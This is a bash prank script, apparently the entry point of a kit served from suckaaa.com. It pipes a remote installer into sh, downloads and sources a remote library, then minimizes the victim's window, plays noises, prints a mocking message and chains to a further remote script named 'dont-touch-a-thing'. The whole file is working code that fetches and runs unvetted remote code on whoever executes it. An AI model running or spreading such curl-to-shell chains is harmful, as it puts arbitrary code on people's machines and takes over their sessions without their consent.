#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!

# When I use this syntax: 'source <(curl https://url-here);'
# in my local comp's shell, I'm able to source files
# from the internet into my current shell just fine.
# But if I use that syntax I get an error when I run:
# 'curl -s https://suckaaa.com/s/z'
# given it tries to source a file with:
# ex: 'source <(curl -s https://suckaaa.com/s/lib);'.
# It doesn't like the '<(' area — basically the cool part
# that looks like Kirby.
# So that's why I introduced the garbage lib.
# If anybody has any ideas on any of this, lemme know!,
# Until any better strategies are found, running the lib-installer
# and sourcing the garbage lib is just basically each bash file module's header
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

# For the gateway script, we'll always want to
# force-update the garbage lib — this is the best way
# I can come up with to do this right now so here it is
curl -s https://suckaaa.com/s/lib > ~/.garbage/lib;
# Re-source the updated file
source ~/.garbage/lib;

cancelNoise;
cancelNoise;
cancelNoise;
cancelNoise;

# Minimize the window
minimize;

# Wait a couple secs
sleep 2s;

# Play some joyful noises
cancelNoise;
cancelNoise;
cancelNoise;
cancelNoise;

# Undo that minimize
reverseMinimize;

sleep 0.8s;

bigMsg '\n\n\nloLLLL!!!!!\n\n\n';

sleep 2s;

nextScript 'https://suckaaa.com/s/dont-touch-a-thing';
